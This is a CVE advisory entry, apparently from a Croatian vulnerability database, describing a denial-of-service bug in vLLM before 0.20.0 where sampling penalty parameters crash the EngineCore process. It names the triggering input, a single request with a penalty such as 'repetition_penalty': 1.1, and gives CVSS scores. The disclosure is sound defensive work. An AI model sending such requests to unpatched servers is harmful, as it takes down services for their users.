| ID |
CVE-2026-44223
|
| Sažetak |
vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0. |
| Reference |
|
| CVSS |
| Base: | 6.5 |
| Impact: | 3.6 |
| Exploitability: | 2.8 |
|
| Pristup |
| Vektor | Složenost | Autentikacija |
| NETWORK |
LOW |
LOW |
|
| Impact |
| Povjerljivost | Cjelovitost | Dostupnost |
| NONE |
NONE |
HIGH |
|
| CVSS vektor |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
| Zadnje važnije ažuriranje |
13-05-2026 - 18:16 |
| Objavljeno |
12-05-2026 - 20:16 |